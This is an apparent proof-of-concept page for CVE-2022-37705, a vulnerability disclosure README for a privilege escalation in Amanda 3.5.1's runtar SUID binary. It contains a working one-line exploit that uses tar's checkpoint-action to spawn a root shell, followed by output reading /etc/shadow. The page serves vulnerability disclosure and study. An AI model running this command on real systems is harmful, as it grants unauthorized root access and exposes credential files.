
CVE-2022-37705 PoC — Amanda Parameter Injection Vulnerability

Source
Associated Vulnerability
Title: Amanda Parameter Injection Vulnerability (CVE-2022-37705)
Description: Amanda is an automated network disk archiver from the University of Maryland at College Park. It lets an IT administrator set up a single master backup server that backs up multiple hosts over the network to tape drives/changers, disk, or optical media. Amanda has a security flaw: crafted arguments passed to the runtar SUID binary lead to local privilege escalation to root.
Description
Amanda 3.5.1 second LPE.
Readme
> [Suggested description]
> A privilege escalation flaw was found in Amanda 3.5.1 that can take the
> backup user to root privileges. The vulnerable component is the runtar
> SUID binary, which is just a wrapper that runs /usr/bin/tar with specific
> arguments that are controllable by the attacker. The program does not
> correctly check the args passed to the tar binary (it assumes that all
> args should be like this: --ARG VALUE, but we can provide this: --ARG=VALUE
> as one argument).
>
> ------------------------------------------
>
> [Additional Information]
> This flaw can be used for Code Execution, Denial of Service, Escalation of Privileges and Information Disclosure.
> This is the PoC to exploit it and get a root shell:
> backup@maher:/lib/amanda$ id
> uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
>
> backup@maher:/lib/amanda$ head /etc/shadow
> head: cannot open '/etc/shadow' for reading: Permission denied
>
> backup@maher:/lib/amanda$ ./runtar NOCONFIG tar  --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null
> tar: Removing leading `/' from member names
> # head /etc/shadow
> root:!:19132:0:99999:7:::
> daemon:*:19101:0:99999:7:::
> bin:*:19101:0:99999:7:::
> sys:*:19101:0:99999:7:::
> sync:*:19101:0:99999:7:::
> games:*:19101:0:99999:7:::
> man:*:19101:0:99999:7:::
> lp:*:19101:0:99999:7:::
> mail:*:19101:0:99999:7:::
> news:*:19101:0:99999:7:::
> #
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Flawed Arguments Checking.
>
> ------------------------------------------
>
> [Vendor of Product]
> Amanda
>
> ------------------------------------------
>
> [Affected Product Code Base]
> runtar - 3.5.1
>
> ------------------------------------------
>
> [Affected Component]
> The affected SUID binary is: runtar
> The affected file is: runtar.c
> The affected lines of code start at line 162.
>
> ------------------------------------------
>
> [Attack Type]
> Local
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> To exploit the binary you just have to give crafted arguments to the runtar SUID binary to escalate to root.
>
> ------------------------------------------
>
> [Reference]
> http://www.amanda.org/
>
> ------------------------------------------
>
> [Discoverer]
> Maher Azzouzi

Use CVE-2022-37705.
File Snapshot

[4.0K] /data/pocs/3ce26f38b46ecfe5b02666ae5f36a4b7d4fd9f93
└── [2.6K] README.md

0 directories, 1 file